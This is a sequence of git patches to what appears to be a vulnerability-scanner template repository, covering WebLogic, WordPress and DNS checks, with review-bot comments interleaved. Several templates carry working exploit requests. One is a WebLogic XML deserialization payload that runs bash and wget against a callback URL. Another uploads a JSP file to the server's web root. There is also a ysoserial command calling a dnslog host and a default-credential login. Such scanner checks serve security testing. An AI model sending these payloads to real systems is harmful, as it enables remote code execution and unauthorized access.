@@ -4,7 +4,7 @@ info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/54329/info + reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin requests: From 59525a5846f37fd5eca99aff887d5db16abd564a Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 13:02:41 +0300 Subject: [PATCH 168/339] Working reference --- vulnerabilities/wordpress/wp-finder-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-finder-xss.yaml b/vulnerabilities/wordpress/wp-finder-xss.yaml index 1bbd46235e..d9dd3851bf 100644 --- a/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -4,7 +4,7 @@ info: name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://www.securityfocus.com/bid/55217/info + reference: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin requests: From 46b16bcfa2960e2d80e4bd22c2c00a4e6d324017 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 12 Sep 2021 14:16:01 +0300 Subject: [PATCH 169/339] Incomplete title --- vulnerabilities/wordpress/wp-super-forms.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-super-forms.yaml b/vulnerabilities/wordpress/wp-super-forms.yaml index 7b1c01e7ad..1d3a407ad9 100644 --- a/vulnerabilities/wordpress/wp-super-forms.yaml +++ b/vulnerabilities/wordpress/wp-super-forms.yaml @@ -1,6 +1,6 @@ id: wordpress-super-forms info: - name: WordPress super-forms + name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. 
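Review bot: The title now names the Super Forms plugin, but the `description` context line directly below it still reads `Searches for sensitive directories present in the wordpress-plugins plugin.`, which is a copy-paste placeholder that contradicts the corrected name. Update it to match, e.g. `description: Detects directory listing of the WordPress Super Forms plugin directories.`, so the two fields describe the same check.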
From 34bba4e794f0251dc84cf0670e6c7e585c27ea81 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:10:52 +0530 Subject: [PATCH 170/339] misc update --- cves/2019/CVE-2019-14470.yaml | 1 - cves/2021/CVE-2021-26295.yaml | 6 ++---- vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml | 2 +- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 82fc91e2cf..d956d7190a 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -4,7 +4,6 @@ info: name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter. reference: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index ab08b76304..42481137f2 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml 
@@ -9,15 +9,13 @@ info: - https://github.com/yumusb/CVE-2021-26295-POC - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E - -# Note:- This is detection template, To perform deserializes do as below -# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot -# `cat mad.ot | hex` and replace in along with the url in std-String value classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-26295 cwe-id: CWE-502 + additional-fileds: + ysoserial-payload: 'java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex' requests: - raw: diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index dfb6f028d4..4fe1fb2f7a 100644 --- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: high tags: wordpress,rce,ssrf - reference: + reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 From 162928ed27111f31c14fc011c730e4f503a238c0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:16:47 +0530 Subject: [PATCH 171/339] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 42481137f2..fa1a549e53 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.80 cve-id: CVE-2021-26295 cwe-id: CWE-502 - additional-fileds: + additional-fields: ysoserial-payload: 'java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex' requests: 
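Review bot: The new `ysoserial-payload` value hardcodes a third-party callback, `http://t53lq9.dnslog.cn`, so anyone who copies the command verbatim sends their deserialization callback to a domain the project does not control, and that dnslog subdomain is almost certainly expired by now. Make the placeholder explicit instead, e.g. `ysoserial-payload: 'java -jar ysoserial.jar URLDNS http://<your-interactsh-or-dnslog-host> | hex'`, and add a short comment that the hex output replaces the value in the template's request body. The request section this refers to is outside the hunk, so whether it already uses `{{interactsh-url}}` could not be checked.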
From 3eb7e213a7d6a7fdef5bcf2cbbb016c6706ba6c6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 17:22:25 +0530 Subject: [PATCH 172/339] Update symantec-ewep.yaml --- exposed-panels/symantec-ewep.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/symantec-ewep.yaml b/exposed-panels/symantec-ewep.yaml index 6891d66808..517d468a5c 100644 --- a/exposed-panels/symantec-ewep.yaml +++ b/exposed-panels/symantec-ewep.yaml @@ -17,6 +17,7 @@ requests: words: - "Symantec Corporation. All Rights Reserved" part: body + - type: status status: - 200 From 11ae38bd01984b5696ac58d21df28356174fde3a Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Sun, 12 Sep 2021 15:45:30 +0300 Subject: [PATCH 173/339] #2636, Add the takeover tag to the template The template indicates a possible subdomain takeover vulnerability, therefore it should have the takeover tag. --- dns/servfail-refused-hosts.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index 99fabbc4f5..21722ac4c7 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -4,7 +4,7 @@ info: name: Servfail Host Finder author: pdteam severity: info - tags: dns + tags: dns,takeover dns: - name: "{{FQDN}}" From e6d97e26c5e9223090763b3dabc272501f0e9aeb Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 18:31:46 +0530 Subject: [PATCH 174/339] additional matcher --- cves/2020/CVE-2020-2551.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index 348fd0ba52..47f08247f8 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -28,6 +28,7 @@ requests: - method: GET path: - "{{BaseURL}}/console/login/LoginForm.jsp" + matchers-condition: and matchers: - type: word 
@@ -38,6 +39,12 @@ requests: - "12.2.1.4" condition: or part: body + + - type: word + words: + - "WebLogic" + part: body + - type: status status: - 200 From 0436e97c0e41503b2e573c84609f677b364400ef Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 18:32:24 +0530 Subject: [PATCH 175/339] payload update to work on both platform --- cves/2017/CVE-2017-10271.yaml | 54 ++++++++++++++--------------------- 1 file changed, 21 insertions(+), 33 deletions(-) diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 1e9b5d37af..16be3163ce 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - tags: cve,cve2017,rce,oracle,weblogic + tags: cve,cve2017,rce,oracle,weblogic,oob classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.50 @@ -24,37 +24,25 @@ requests: Content-Type: text/xml - + - - - - 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 - - - - com.supeream.exploits.XmlExp - - - - cat /etc/passwd - + + + + + + /bin/bash - - - - - - - - - - - - + + -c - - + + wget {{interactsh-url}} + + + @@ -62,7 +50,7 @@ requests: matchers: - - type: regex - regex: - - 'root:.*:0:0' - part: body + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 4337232f6e1969bebf85ad2c6519990fef3479e6 Mon Sep 17 00:00:00 2001 From: Rotem Reiss Date: Sun, 12 Sep 2021 17:14:20 +0300 Subject: [PATCH 176/339] #2636, Remove takeover tag from template --- dns/can-i-take-over-dns.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml index fb4f8b6520..d8e4b48d41 100644 --- a/dns/can-i-take-over-dns.yaml +++ b/dns/can-i-take-over-dns.yaml 
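Review bot: The new matcher in CVE-2017-10271.yaml accepts only `interactsh_protocol` equal to `http`, so a host where the injected `/bin/bash -c wget {{interactsh-url}}` runs but outbound HTTP is egress-filtered produces no finding even though the wget call still resolves the per-scan interactsh hostname. Since that DNS lookup alone proves the command executed, match `words: ["dns", "http"]` (default `or`), or document in a comment why HTTP alone is required. The `/bin/bash` path also means Windows-hosted WebLogic instances cannot be confirmed, which was already true of the `cat /etc/passwd` variant this replaces but deserves a comment now that the template is tagged `oob`. The XML payload in this hunk is partially stripped in the rendering, so the exact request body could not be verified.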
@@ -4,7 +4,7 @@ info: name: Can I Take Over DNS - Fingerprint author: pdteam severity: info - tags: dns,ns,takeover + tags: dns,ns reference: https://github.com/indianajson/can-i-take-over-dns dns: From 35e8c3c1cf61b898ac365b21321b8ddbf107dff5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 19:50:30 +0530 Subject: [PATCH 177/339] Added complete poc --- cves/2018/CVE-2018-2894.yaml | 84 ++++++++++++++++++++++++++++++++---- 1 file changed, 75 insertions(+), 9 deletions(-) diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index a192dae23d..c89db2db55 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml 
@@ -2,25 +2,91 @@ id: CVE-2018-2894 info: name: Oracle WebLogic RCE - author: geeknik + author: geeknik,pdteam description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. - reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ severity: critical tags: cve,cve2018,oracle,weblogic,rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2018-2894 + reference: + - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ + - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 requests: - - method: GET - path: - - "{{BaseURL}}/ws_utc/config.do" + - raw: + - | + POST /ws_utc/resources/setting/options HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80 + + - | + POST /ws_utc/resources/setting/keystore HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_name" + + {{randstr}} + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_edit_mode" + + false + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password_front" + + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password" + + + ------WebKitFormBoundaryuim0dyiDSPBPu31g + Content-Disposition: form-data; name="ks_password_changed" + + false + ------WebKitFormBoundaryuim0dyiDSPBPu31g + 
Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" + Content-Type: application/octet-stream + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + + <% + String cve = "CVE-2018-2894"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + ------WebKitFormBoundaryuim0dyiDSPBPu31g-- + + - | + GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: id + internal: true + group: 1 + regex: + - '([0-9]+){{randstr}}' - redirects: true matchers: - type: word words: - - "* Copyright (c) 2005,2013, Oracle" - - "settings" - condition: and \ No newline at end of file + - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) From 29a944ea73c86a2ed3d8f8c46b82c04b5e155b71 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 20:22:03 +0530 Subject: [PATCH 178/339] payload update --- cves/2014/CVE-2014-4210.yaml | 11 ++++------- cves/2020/CVE-2020-14882.yaml | 1 + 2 files changed, 5 insertions(+), 7 deletions(-) diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index 42932519fa..df8ec6f136 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -4,7 +4,7 @@ info: name: Weblogic SSRF in SearchPublicRegistries.jsp author: princechaddha severity: medium - tags: cve,cve2014,weblogic,oracle,ssrf + tags: cve,cve2014,weblogic,oracle,ssrf,oob reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html 
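Review bot: The `BasicConfigOptions.workDir` value in the first request is hardcoded to `/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css`, where `base_domain`, `AdminServer` and the `4mcj4y` staging directory are specific to the vulhub image cited in the references; on a real installation the domain, server and random directory names differ, the keystore upload lands elsewhere and the final `GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp` returns 404, so the template will miss most vulnerable production hosts. State this in the description, or extract the real work directory from the `/ws_utc/config.do` page the removed GET used to fetch, which presumably displays the current setting — to be confirmed. Also add a comment that the check writes a JSP under the target's web root and never removes it: the file only prints an MD5, but it is an artifact the engagement has to clean up. The JSP body in this hunk is partially stripped in the rendering (`for (int i=0;i` loses its bound), so its exact content could not be verified.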
@@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700" + - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}" matchers-condition: and matchers: @@ -22,9 +22,6 @@ requests: - 200 - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "Connection refused" - - "Socket Closed" - - "content-type: unknown/unknown" - part: body - condition: or + - "http" diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 50635623d5..382be20081 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -47,6 +47,7 @@ requests: - "\\[(font|extension|file)s\\]" condition: or part: body + - type: status status: - 200 \ No newline at end of file From e831dd4fe0f27a10d48c62875f566c9504e4b6bf Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 12 Sep 2021 20:45:49 +0530 Subject: [PATCH 179/339] lint error fix --- cves/2018/CVE-2018-2894.yaml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index c89db2db55..c5c306ce1f 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml 
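Review bot: Switching `operator=` to `{{interactsh-url}}` and matching only `interactsh_protocol` = `http` drops the in-band error-string matchers (`Connection refused`, `Socket Closed`, `content-type: unknown/unknown`), so a target whose outbound HTTP is blocked now yields no finding even though the SSRF still fires. Matching `words: ["dns", "http"]` keeps the check working in egress-filtered environments, because resolving the per-scan interactsh name already proves the server fetched an attacker-chosen URL. A comment noting that the template now requires OOB connectivity, consistent with the new `oob` tag, would help anyone running it offline.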
@@ -20,45 +20,45 @@ requests: POST /ws_utc/resources/setting/options HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - + setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80 - | POST /ws_utc/resources/setting/keystore HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g - + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_name" - + {{randstr}} ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_edit_mode" - + false ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password_front" - - + + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password" - - + + ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_password_changed" - + false ------WebKitFormBoundaryuim0dyiDSPBPu31g Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp" Content-Type: application/octet-stream - + <%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> - + <% String cve = "CVE-2018-2894"; MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); + alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); @@ -69,7 +69,7 @@ requests: if(hx.length() == 1){hx = "0" + hx;} hashedpasswd.append(hx); } - + out.println(hashedpasswd.toString()); %> ------WebKitFormBoundaryuim0dyiDSPBPu31g-- From b46cd37b47faf475a87c23216dd353f07e521fc2 Mon Sep 17 00:00:00 2001 
From: sandeep Date: Sun, 12 Sep 2021 20:53:13 +0530 Subject: [PATCH 180/339] Added default weblogic login --- .../weblogic/weblogic-default-login.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 default-logins/weblogic/weblogic-default-login.yaml diff --git a/default-logins/weblogic/weblogic-default-login.yaml b/default-logins/weblogic/weblogic-default-login.yaml new file mode 100644 index 0000000000..310ae8dbb3 --- /dev/null +++ b/default-logins/weblogic/weblogic-default-login.yaml @@ -0,0 +1,35 @@ +id: weblogic-default-login + +info: + name: WebLogic default login + author: pdteam + severity: high + tags: default-login,weblogic + reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/weak_password + +requests: + - raw: + - | + GET /console/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8 + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/console/index.jsp" + - "ADMINCONSOLESESSION" + condition: and + + - type: status + status: + - 302 \ No newline at end of file From f092d5dab7fd9850b0256284354d5f567aabe64e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:26:20 +0530 Subject: [PATCH 181/339] Update CVE-2010-2037.yaml --- cves/2010/CVE-2010-2037.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-2037.yaml b/cves/2010/CVE-2010-2037.yaml index 9a9b24c3e6..e3db0ee030 100644 --- a/cves/2010/CVE-2010-2037.yaml +++ b/cves/2010/CVE-2010-2037.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/34005 - https://www.cvedetails.com/cve/CVE-2010-2037 - tags: cve,cve2010,lfi + tags: cve,cve2010,lfi,joomla requests: - method: GET 
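Review bot: The second request tries a single hardcoded pair, `j_username=weblogic&j_password=Oracle@123`, whereas the vulhub weak_password page it references presumably lists several common defaults (`weblogic/weblogic`, `weblogic/welcome1`, ...), so a small `payloads:` list with `attack: pitchfork` would cover more hosts. Keep that list short and say why in a comment: WebLogic's default security realm locks an account after a handful of failed logins (five by default, for a configurable duration), so a broad wordlist against the `weblogic` account can lock the real administrator out of the console, turning a credential check into a denial of service. Suggested comment above the POST: `# Keep attempts minimal: WebLogic's default realm locks the account after 5 failed logins.` The 302-plus-`ADMINCONSOLESESSION` matcher itself looks sound, since a failed login is redirected back to the login form rather than `/console/index.jsp`.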
From 6975422e79c07d7e461784fc759da81f32b693f4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:27:22 +0530 Subject: [PATCH 182/339] Update oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml index 04d90cc407..473e0db989 100644 --- a/exposed-panels/oracle-business-control.yaml +++ b/exposed-panels/oracle-business-control.yaml @@ -4,9 +4,8 @@ info: name: Oracle Commerce Business Control Center author: dhiyaneshDk severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 requests: - method: GET From 59c91400c6e069cb58b34d9e6bb4b045e994ffe2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:27:48 +0530 Subject: [PATCH 183/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 8a61b0ea64..3068208fab 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -5,8 +5,7 @@ info: author: dhiyaneshDk severity: info tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 requests: - method: GET From a90f10a4200234846a97ebfb195710d951593fa7 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:24 +0530 Subject: [PATCH 184/339] Update oracle-people-enterprise.yaml --- exposed-panels/oracle-people-enterprise.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/exposed-panels/oracle-people-enterprise.yaml b/exposed-panels/oracle-people-enterprise.yaml index eba64c8a2a..8f732871c5 100644 --- a/exposed-panels/oracle-people-enterprise.yaml +++ b/exposed-panels/oracle-people-enterprise.yaml @@ -4,9 +4,8 @@ info: name: Oracle Peoplesoft Enterprise author: dhiyaneshDk severity: info - tags: oracle,login - reference: - - https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 + tags: oracle,login,panel requests: - method: GET From bbde06af581fa99e7ca6453115718e97e3a5d155 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:33 +0530 Subject: [PATCH 185/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 3068208fab..c18a630cb9 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -4,7 +4,7 @@ info: name: Oracle(R) Integrated Lights Out Manager author: dhiyaneshDk severity: info - tags: oracle,login + tags: oracle,login,panel reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 requests: From 4a68ea4346d29b4610085d31d03547c26b208580 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 21:28:44 +0530 Subject: [PATCH 186/339] Update oracle-business-control.yaml --- exposed-panels/oracle-business-control.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/exposed-panels/oracle-business-control.yaml b/exposed-panels/oracle-business-control.yaml index 473e0db989..e5c490c80e 100644 --- a/exposed-panels/oracle-business-control.yaml +++ b/exposed-panels/oracle-business-control.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Commerce%22 - tags: oracle,login + tags: oracle,login,panel requests: - method: GET From 64df660fd6a81feca2cee877b06be9d6a45c6832 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:15:21 +0530 Subject: [PATCH 187/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index c18a630cb9..4df36b9b46 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -17,6 +17,7 @@ requests: - type: word words: - 'Oracle(R) Integrated Lights Out Manager - Login' + part: body - type: status status: From 716a9a0a6db44e486ed526ff810d1c5e2f5214a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 22:15:54 +0530 Subject: [PATCH 188/339] Update oracle-integrated-manager.yaml --- exposed-panels/oracle-integrated-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/oracle-integrated-manager.yaml b/exposed-panels/oracle-integrated-manager.yaml index 4df36b9b46..13aa0c5c1b 100644 --- a/exposed-panels/oracle-integrated-manager.yaml +++ b/exposed-panels/oracle-integrated-manager.yaml @@ -4,8 +4,8 @@ info: name: Oracle(R) Integrated Lights Out Manager author: dhiyaneshDk severity: info - tags: oracle,login,panel reference: https://www.shodan.io/search?query=http.title%3A%22Oracle%28R%29+Integrated+Lights+Out+Manager%22&page=2 + tags: oracle,login,panel requests: - method: GET 
